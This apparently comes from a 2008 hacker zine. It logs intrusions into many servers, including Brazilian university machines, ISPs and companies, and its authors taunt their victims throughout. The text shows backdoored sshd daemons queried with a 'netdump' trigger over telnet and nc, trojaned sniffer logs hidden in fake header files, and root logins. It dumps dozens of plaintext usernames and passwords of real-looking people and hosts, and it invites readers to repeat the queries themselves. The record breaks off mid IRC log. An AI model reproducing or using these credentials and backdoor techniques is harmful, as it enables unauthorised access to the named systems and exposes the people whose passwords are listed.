SSH2_OUT: 10.0.0.60 <http://10.0.0.60> user: fsilveira
pass: VaiPasSar
SSH2_OUT: 10.0.0.75 <http://10.0.0.75> user: davidvaz pass:
2o3145 (DOAS-Laptop.if.uff.int <http://DOAS-Laptop.if.uff.int>)
SSH2_OUT: 10.0.0.78 <http://10.0.0.78> user: alan pass:
ck37=2x (urania.if.uff.int <http://urania.if.uff.int>)
SSH2_OUT: 10.0.0.93 <http://10.0.0.93> user: pmco pass:
druida99 (urubu.if.uff.int <http://urubu.if.uff.int>)
SSH2_OUT: 10.0.0.93 <http://10.0.0.93> user: pmco pass:
druidruida99 (urubu.if.uff.int <http://urubu.if.uff.int>)
SSH2_OUT: 10.0.0.97 <http://10.0.0.97> user: critter pass:
559832 (ronaldinho.if.uff.int <http://ronaldinho.if.uff.int>)
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 203.161.120.230
<http://203.161.120.230> 22
Trying 203.161.120.230...
Connected to 203.161.120.230 <http://203.161.120.230>.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> letmein
pass_from: 58.7.216.153 <http://58.7.216.153> user:
root pass: @pixar87 (dsl-58-7-216-153.wa.westnet.com.au <http://dsl-58-7-216-153.wa.westnet.com.au>) -> h3h3, sorry pal.
central@labsec [~xoxox/h3h3] # ssh root@203.161.120.230
<mailto:root@203.161.120.230>
root@203.161.120.230 <mailto:root@203.161.120.230>'s password: ----- no skynet ------- Last login: Tue Aug 12 19:32:36 2008 from
dsl-58-7-216-153.wa.westnet.com.au <http://dsl-58-7-216-153.wa.westnet.com.au>
zeus:~#
zeus:/usr/include/linux# uname -a;w;/sbin/ifconfig -a|grep inet
Linux zeus 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
15:27:04 up 104 days, 6:19, 1 user, load average: 0.00, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:203.161.120.230 <http://203.161.120.230>
Bcast:203.161.120.255 <http://203.161.120.255> Mask:255.255.255.240 <http://255.255.255.240>
inet6 addr: fe80::209:3dff:fe12:67e8/64 Scope:Link
inet addr:11.11.11.3 <http://11.11.11.3>
Bcast:11.255.255.255 <http://11.255.255.255> Mask:255.255.255.0 <http://255.255.255.0>
zeus:/usr/include/linux# ./sheader
/usr/include/linux/byteorder/ssh.h|sort|uniq|more
SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: michael pass:
@pixar87
SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: michael pass:
dh0st1ngd
SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: michael pass:
ruup2it
SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: root pass:
@pixar87
SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: admin pass:
@pixar87
SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: admin pass:
emaildivers
SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: admin pass:
jugg3r0
SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: root pass:
@pixar887
SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: root pass:
jugg3r0
pass_from: 10.10.10.129 <http://10.10.10.129> user:
root pass: @pixar87
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 207.145.66.12
<http://207.145.66.12> 22
Trying 207.145.66.12...
Connected to 207.145.66.12 <http://207.145.66.12>.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> smack
pass_from: 24.218.192.76 <http://24.218.192.76> user:
root pass: cl1pt3xt (c-24-218-192-76.hsd1.ma.comcast.net <http://c-24-218-192-76.hsd1.ma.comcast.net>)-> sorry bro
pass_from: 75.68.31.152 <http://75.68.31.152> user:
gman pass: 0xc0ffee (c-75-68-31-152.hsd1.nh.comcast.net <http://c-75-68-31-152.hsd1.nh.comcast.net>) -> >:(
central@labsec [~xoxox/h3h3] # ssh root@207.145.66.12
<mailto:root@207.145.66.12>
root@207.145.66.12 <mailto:root@207.145.66.12>'s password:
Last login: Wed Aug 6 23:25:38 2008 from 189.4.184.201
<http://189.4.184.201> --------->>>>>>>>>>>>>>>>>>>>>>>>> quick question, who's that ?
--------->>>>>>>>>>>>>>>>>>>>>>>>> doesn't that make you sad? i mean, wtf...
d4:~#
d4:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux d4 2.6.25-2-686 #1 SMP Tue May 27 15:38:35 UTC 2008 i686
GNU/Linux
03:36:51 up 68 days, 4:58, 0 user, load average: 1.88, 1.80, 1.74
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:207.145.66.12 <http://207.145.66.12>
Bcast:207.145.66.255 <http://207.145.66.255> Mask:255.255.255.0 <http://255.255.255.0>
inet6 addr: fe80::209:6bff:fe8c:e58/64 Scope:Link
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 212.111.196.163
<http://212.111.196.163> 22
Trying 212.111.196.163...
Connected to 212.111.196.163 <http://212.111.196.163>.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> i DEMAND THE PASSWORD !
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
x4rtuhg6 (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, i missed you, localhost.
pass_from: ::ffff:10.66.10.111 <http://10.66.10.111> user:
root pass: dihlordifenil --------->>>>>>>>>>>>>>>>>>>>>>>>> h3h3 >;(
central@labsec [~xoxox/h3h3] # ssh root@212.111.196.163
<mailto:root@212.111.196.163>
root@212.111.196.163 <mailto:root@212.111.196.163>'s password: Last login: Fri Aug 8 19:49:52 2008 from 189.4.161.222
<http://189.4.161.222> ------------>>>>>>>>>>>>>> lets laugh for a while now
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux users 2.6.23-gentoo i686 ****
root@users:~#
root@users:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux users 2.6.23-gentoo #4 SMP PREEMPT Fri Dec 14 19:43:35 EET
2007 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux
10:49:08 up 171 days, 22:37, 1 user, load average: 0.20, 0.24, 0.21
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 10:46 0.00s 0.44s 0.00s w
inet addr:192.168.253.3 <http://192.168.253.3>
Bcast:192.168.253.255 <http://192.168.253.255> Mask:255.255.255.0 <http://255.255.255.0>
inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
inet addr:169.254.78.132 <http://169.254.78.132>
Bcast:169.254.255.255 <http://169.254.255.255> Mask:255.255.0.0 <http://255.255.0.0>
inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0
<http://255.0.0.0>
inet6 addr: ::1/128 Scope:Host
inet addr:212.111.196.163 <http://212.111.196.163>
Bcast:212.111.196.191 <http://212.111.196.191> Mask:255.255.255.224 <http://255.255.255.224>
inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
inet addr:212.26.143.6 <http://212.26.143.6>
Bcast:212.26.143.7 <http://212.26.143.7> Mask:255.255.255.252 <http://255.255.255.252>
inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 212.143.216.226
<http://212.143.216.226> 22
Trying 212.143.216.226...
Connected to 212.143.216.226 <http://212.143.216.226>.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> im getting tired of this.
pam_from: 62.219.238.196 <http://62.219.238.196> user:
root pass: QWERFcxz (mail2.tikalnetworks.com <http://mail2.tikalnetworks.com>) ----->>>>>>>> no kidding.
central@labsec [~xoxox/h3h3] # ssh root@212.143.216.226
<mailto:root@212.143.216.226>
root@212.143.216.226 <mailto:root@212.143.216.226>'s password: jessica temp # uname -a;w;/sbin/ifconfig -a|grep inet Linux jessica 2.6.17-gentoo-r7 #3 Sun Sep 3 11:17:41 IDT 2006 i686
Intel(R) Celeron(R) CPU 2.66GHz GenuineIntel GNU/Linux
09:58:11 up 3 days, 18:03, 1 user, load average: 1.29, 1.16, 1.08
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 09:34 16:19 0.32s 0.30s ssh 10.0.0.3
<http://10.0.0.3>
inet addr:10.0.0.253 <http://10.0.0.253>
Bcast:10.0.0.255 <http://10.0.0.255> Mask:255.255.255.0 <http://255.255.255.0>
inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0
<http://255.0.0.0>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103
<http://143.107.133.103> 22|grep OUT
SSH2_OUT: 143.107.133.38 <http://143.107.133.38> user:
wlscopel pass: va1513zb (feynman.if.usp.br <http://feynman.if.usp.br>)
SSH2_OUT: 143.107.133.233 <http://143.107.133.233> user:
pdborges pass: mipa0529 (aegir.if.usp.br <http://aegir.if.usp.br>)
SSH2_OUT: 143.106.42.243 <http://143.106.42.243> user:
luana pass: 103174b (athenas.cna.unicamp.br <http://athenas.cna.unicamp.br>)
SSH2_OUT: 143.107.133.8 <http://143.107.133.8> user:
kpp pass: fth6mdy (landauer.if.usp.br <http://landauer.if.usp.br>)
SSH2_OUT: 143.107.133.47 <http://143.107.133.47> user:
luana pass: 103174b (schroedinger.if.usp.br <http://schroedinger.if.usp.br>)
SSH2_OUT: 143.107.133.76 <http://143.107.133.76> user:
mvarella pass: CH3Ftri (planck.if.usp.br <http://planck.if.usp.br>)
SSH2_OUT: 143.107.133.38 <http://143.107.133.38> user:
wlscopel pass: va1513zb (feynman.if.usp.br <http://feynman.if.usp.br>)
SSH2_OUT: 143.107.133.47 <http://143.107.133.47> user:
cedric pass: KunD1cka (schroedinger.if.usp.br <http://schroedinger.if.usp.br>)
central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103
<http://143.107.133.103> 22|grep from|grep -v bullshit
pass_from: 143.107.133.244 <http://143.107.133.244> user:
hmf18 pass: xpx9b15+ (turista.if.usp.br <http://turista.if.usp.br>)
pass_from: 201.52.218.156 <http://201.52.218.156> user:
cedric pass: P1chona04 (c934da9c.virtua.com.br <http://c934da9c.virtua.com.br>)
pass_from: 201.82.105.213 <http://201.82.105.213> user:
mfsoares pass: 3p1t@xy (c95269d5.virtua.com.br <http://c95269d5.virtua.com.br>)
pass_from: 189.34.88.209 <http://189.34.88.209> user:
kpp pass: mdc6gpt (bd2258d1.virtua.com.br <http://bd2258d1.virtua.com.br>)
pass_from: 189.102.19.167 <http://189.102.19.167> user:
pontes pass: r@s&09* (bd6613a7.virtua.com.br <http://bd6613a7.virtua.com.br>)
pass_from: 189.102.98.126 <http://189.102.98.126> user:
lassali pass: las2008ro (bd66627e.virtua.com.br <http://bd66627e.virtua.com.br>)
central@labsec [~xoxox/h3h3] # ssh root@143.107.133.103
<mailto:root@143.107.133.103> 'uname -a'
root@143.107.133.103 <mailto:root@143.107.133.103>'s password: Linux romeo 2.6.5-7.286-smp #1 SMP Thu May 31 10:12:58 UTC 2007
x86_64 x86_64 x86_64 GNU/Linux
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 200.144.186.37
<http://200.144.186.37> 22
Trying 200.144.186.37...
Connected to shark.lcca.usp.br <http://shark.lcca.usp.br>
(200.144.186.37 <http://200.144.186.37>).
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> k from now on, no more netdump messages
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> just got tired, u knoW
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: amazonas pass:
UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> anyway im almost stopping pasting stuff
-> alot of kool shit regarding usp.br <http://usp.br> here
try yourself-> echo netdump|nc 200.144.186.37
<http://200.144.186.37> 22|grep usp.br <http://usp.br>
or just grep OUT
kthxnpurwelcome
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74
<http://200.145.203.74> 22|grep localhost
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
ArmY1*00 (localhost) ->>>>>>>>>>>>>>>>> im glad you are here :) kind of makes it easy
central@labsec [~xoxox/h3h3] # ssh root@200.145.203.74
<mailto:root@200.145.203.74>
root@200.145.203.74 <mailto:root@200.145.203.74>'s password: Last login: Thu Jul 31 09:30:33 2008 from nemo.df.ibilce.unesp.br
<http://nemo.df.ibilce.unesp.br>
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux hobbes 2.6.18-6-686 i686 ****
root@hobbes:~#
root@hobbes:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux hobbes 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686
GNU/Linux
05:47:44 up 27 days, 15:12, 1 user, load average: 0.21, 0.15, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
rico :0 - 06Aug08 ?xdm? 5:39 0.71s
x-session-manager
inet addr:200.145.203.74 <http://200.145.203.74>
Bcast:200.145.203.255 <http://200.145.203.255> Mask:255.255.255.0 <http://255.255.255.0>
inet6 addr: fe80::2e0:7dff:fed7:f778/64 Scope:Link
inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0
<http://255.0.0.0>
inet6 addr: ::1/128 Scope:Host
root@hobbes:~#
central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74
<http://200.145.203.74> 22|grep unesp
pass_from: 200.145.203.42 <http://200.145.203.42> user:
rico pass: so31fia12 (nemo.df.ibilce.unesp.br <http://nemo.df.ibilce.unesp.br>)
SSH2_OUT: 200.145.203.42 <http://200.145.203.42> user:
ronaldo pass: LANmu80 (nemo.df.ibilce.unesp.br <http://nemo.df.ibilce.unesp.br>)
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 67.15.56.12
<http://67.15.56.12> 22
Trying 67.15.56.12...
Connected to 67.15.56.12 <http://67.15.56.12>.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.9
netdump
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
l3nny1nt3l (localhost)
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: lenny pass:
l3nny1nt3l (localhost)
pass_from: 76.188.180.141 <http://76.188.180.141> user:
joe pass: 1207j0s3ph7ys0n9813 (cpe-76-188-180-141.neo.res.rr.com <http://cpe-76-188-180-141.neo.res.rr.com>)
pass_from: 76.188.180.141 <http://76.188.180.141> user:
devel pass: ha1W0;rlD.0121 (cpe-76-188-180-141.neo.res.rr.com <http://cpe-76-188-180-141.neo.res.rr.com>)
pass_from: 76.188.180.141 <http://76.188.180.141> user:
celtrust pass: 1207j0s3ph9813 (cpe-76-188-180-141.neo.res.rr.com <http://cpe-76-188-180-141.neo.res.rr.com>)
central@labsec [~xoxox/h3h3] # ssh root@67.15.56.12
<mailto:root@67.15.56.12>
root@67.15.56.12 <mailto:root@67.15.56.12>'s password:
Last login: Tue Aug 12 00:51:58 2008 from
c-98-234-65-222.hsd1.ca.comcast.net <http://c-98-234-65-222.hsd1.ca.comcast.net>
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux f1.celtrust.com
<http://f1.celtrust.com> 2.6.9-34.ELsmp i686 ****
[root[@f1 ~]#
[root[@f1 ~]# uname -a;w;/sbin/ifconfig -a|grep inet
Linux f1.celtrust.com <http://f1.celtrust.com> 2.6.9-34.ELsmp #1
SMP Fri Feb 24 16:54:53 EST 2006 i686 i686 i386 GNU/Linux
05:20:15 up 153 days, 9:30, 0 users, load average: 2.62, 1.27, 0.63
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:67.15.56.12 <http://67.15.56.12>
Bcast:67.15.57.255 <http://67.15.57.255> Mask:255.255.254.0 <http://255.255.254.0>
inet6 addr: fe80::211:11ff:fe67:a66b/64 Scope:Link
inet addr:67.15.57.240 <http://67.15.57.240>
Bcast:67.15.57.255 <http://67.15.57.255> Mask:255.255.255.0 <http://255.255.255.0>
inet addr:67.15.57.241 <http://67.15.57.241>
Bcast:67.15.57.255 <http://67.15.57.255> Mask:255.255.255.0 <http://255.255.255.0>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # ssh root@66.119.174.19
<mailto:root@66.119.174.19>
root@66.119.174.19 <mailto:root@66.119.174.19>'s password: **** Connected to **** ### # ### ## ### ## ### ### ###### ###### ## # ## # ## ## ## # ## # # ## # #### ### #### ### # #### ## ### #### ## ##### ## ## # ## ## ## ## ## ## ## ## ## #### #### ## #### ### ## ###### #### 1.0 **** Linux res1.van.metrobridge.net
<http://res1.van.metrobridge.net> 2.6.18-5-686 i686 ****
root@res1:~#
root@res1:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux res1.van.metrobridge.net <http://res1.van.metrobridge.net>
2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 GNU/Linux
12:54:34 up 315 days, 17:40, 4 users, load average: 0.58, 0.35, 0.27
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
sky pts/0 66.119.176.2 <http://66.119.176.2> 11:41
1:12 0.00s 0.00s -bash
sky pts/3 66.119.176.2 <http://66.119.176.2> Tue15
20:53 0.18s 0.00s sshd: sky [priv]
sky pts/6 66.119.176.2 <http://66.119.176.2> 11:42
1:10 0.16s 0.01s sshd: sky [priv]
vee pts/7 74.221.143.3 <http://74.221.143.3> 12:23
28:41m 0.07s 0.00s telnet seton-3550
inet addr:66.119.174.4 <http://66.119.174.4>
Bcast:66.119.174.15 <http://66.119.174.15> Mask:255.255.255.240 <http://255.255.255.240>
inet6 addr: fe80::219:b9ff:fee1:c808/64 Scope:Link
inet addr:66.119.174.29 <http://66.119.174.29>
Bcast:66.119.174.31 <http://66.119.174.31> Mask:255.255.255.240 <http://255.255.255.240>
inet addr:65.39.152.235 <http://65.39.152.235>
Bcast:65.39.152.255 <http://65.39.152.255> Mask:255.255.255.224 <http://255.255.255.224>
inet addr:65.39.152.237 <http://65.39.152.237>
Bcast:65.39.152.255 <http://65.39.152.255> Mask:255.255.255.224 <http://255.255.255.224>
inet addr:66.119.174.19 <http://66.119.174.19>
Bcast:66.119.174.31 <http://66.119.174.31> Mask:255.255.255.240 <http://255.255.255.240>
inet addr:65.39.152.239 <http://65.39.152.239>
Bcast:65.39.152.255 <http://65.39.152.255> Mask:255.255.255.224 <http://255.255.255.224>
inet addr:66.119.174.3 <http://66.119.174.3>
Bcast:66.119.174.15 <http://66.119.174.15> Mask:255.255.255.240 <http://255.255.255.240>
inet addr:66.119.174.2 <http://66.119.174.2>
Bcast:66.119.174.15 <http://66.119.174.15> Mask:255.255.255.240 <http://255.255.255.240>
pass_from: 66.119.176.2 <http://66.119.176.2> user:
simon pass: pass77 (mail.metrobridge.com <http://mail.metrobridge.com>) [whole metrobridge with the same pass]
pass_from: 66.119.176.2 <http://66.119.176.2> user:
sky pass: rotoFro7 (mail.metrobridge.com <http://mail.metrobridge.com>) [whole metrobridge with the same pass]
have fun
- what a shame.. again, metrobridge ? i told you to keep on eye on
your sshd since your zine :(
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # ssh root@200.239.200.102
<mailto:root@200.239.200.102>
root@200.239.200.102 <mailto:root@200.239.200.102>'s password: Last login: Mon Aug 11 09:09:40 2008 from stml030.microlink.com.br
<http://stml030.microlink.com.br>
Linux 2.6.11.12-ul1.
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux proxy2-rj 2.6.11.12-ul1 i686 ****
root@proxy2-rj:~#
root@proxy2-rj:~# uname -a;hostname -f;w
Linux proxy2-rj 2.6.11.12-ul1 #1 Tue Aug 30 12:40:56 BRT 2005 i686
unknown
proxy2-rj.pop-rio.com.br <http://proxy2-rj.pop-rio.com.br> 17:14:22 up 97 days, 5:09, 0 users, load average: 2.16, 1.88, 1.76 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root@proxy2-rj:~# root@proxy2-rj:~# ./sshread mac.h|grep 200\.239|sort|uniq pass_from: 200.239.245.50 <http://200.239.245.50> user:
root pass: Beth01@ (gwpr03.microlink.com.br <http://gwpr03.microlink.com.br>)
pass_from: 200.239.245.70 <http://200.239.245.70> user:
root pass: pa$$w0rd (Froes.microlink.com.br <http://Froes.microlink.com.br>)
root@proxy2-rj:~# ./sshread mac.h|grep OUT
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
BuCaaAadd (localhost) -----> /me laughs
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # ssh root@143.107.250.214
<mailto:root@143.107.250.214>
root@143.107.250.214 <mailto:root@143.107.250.214>'s password: Last login: Fri Jun 13 14:58:50 2008 from 143-107-55-100.iq.usp.br
<http://143-107-55-100.iq.usp.br>
..... !! HELLO WORLD !! .....
@@@@@@ @@@@@@
@@ @@ @@ @@
@@ @@ @@ @@@ @@ @@ @@ @@@ @@ @@
@@ @@ @@ @ @@ @@ @@ @@ @ @@ @@ @@
IIII II I II IIII II I II IIII
IIII III II IIII III II IIII
II II II II II II II II II II
II II IIIIII II II IIIIII II II
**** Linux noelrosa.iq.usp.br
<http://noelrosa.iq.usp.br> 2.6.9-42.0.10.EL x86_64 **** ->>>> new kool motd, n1cE rIpZ
[root[@noelrosa ~]#
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< s0RrY bUT
We g0T tiReD oF pAstIng StUfF lIkE thAT
-;;;;;;; i think thats enough to paste, right ? -;;;;;; anyway, in the end/bottom of this 'zine' there is a file
to download with some of the ip's that weve got from them
-/-/-/-/-/-/-/-/-/-/ lEtz havE fuN WiTH r47's BnC rigHT noW
-/-/-/-/-/-/-/-/-/-/
r47 is r47 () bl4ckh47 org <mailto:r47 () bl4ckh47 org> * i own
u! [and We own you!]
r47 on @#combat #osiris @#/<-rad
r47 using irc.ipv6.he.net <http://irc.ipv6.he.net> Hurricane
Electric IPV6 IRC Server
r47 actually using host 2001:470:1f15:42b::3
r47 End of /WHOIS list.
central@labsec [~xoxox/h3h3] # ssh root () bl4ckh47 org
<mailto:root () bl4ckh47 org> -p 2222 bash
root () bl4ckh47 org <mailto:root () bl4ckh47 org>'s password:
.niklincith08. (same pass goes for all casablanca.cz/eurosignal.cz <http://casablanca.cz/eurosignal.cz>)
uname -a;w;hostname -f
Linux VoIP-Mnisek 2.6.18-3-k7-pj #2 Tue Feb 27 18:30:13 CET 2007
i686 GNU/Linux
10:13:26 up 162 days, 8:25, 0 users, load average: 0.04, 0.05, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
VoIP.eurosignal.cz <http://VoIP.eurosignal.cz>
sit0 Link encap:IPv6-in-IPv4
inet6 addr: ::10.0.2.254/96 <http://10.0.2.254/96>
Scope:Compat
inet6 addr: ::127.0.0.1/96 <http://127.0.0.1/96>
Scope:Unknown
inet6 addr: ::10.0.2.4/96 <http://10.0.2.4/96> Scope:Compat
inet6 addr: ::77.78.84.242/96 <http://77.78.84.242/96>
Scope:Compat
UP RUNNING NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
sit1 Link encap:IPv6-in-IPv4
inet6 addr: 2001:470:1f15:42b::2/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::3/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::4/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::5/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::6/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::7/64 Scope:Global
inet6 addr: fe80::a00:2fe/64 Scope:Link
inet6 addr: fe80::a00:204/64 Scope:Link
inet6 addr: fe80::4d4e:54f2/64 Scope:Link
UP POINTOPOINT RUNNING NOARP MTU:1480 Metric:1
RX packets:16700 errors:0 dropped:0 overruns:0 frame:0
TX packets:9917 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1677861 (1.6 MiB) TX bytes:982003 (958.9 KiB)
tcp 0 0 77.48.84.242:65535
<http://77.48.84.242:65535> 189.4.189.139:61593 <http://189.4.189.139:61593> ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:51338 2001:41e0:5::6667:6667
ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:49197 2001:470:0:6667::2:6667
ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:48159 2001:40a8:3000:1:0:6667
ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:51411 2001:40a8:3000:1:0:6667
ESTABLISHED
perl 12655 root 4u IPv4 3027913 TCP *:65535
(LISTEN)
root 12655 0.0 0.3 5256 3220 ? S Mar19 2:39
supervise log
- nice process name btw
- lets start the sniffer, shall we? - btw im using the ircsniff.pl
you stole from efnet's box, thanks -
<- :d0n_!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :u know d0n
<- :d0n_!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :he took my nick
<- :d0n_!burnout () burnout bitchx org
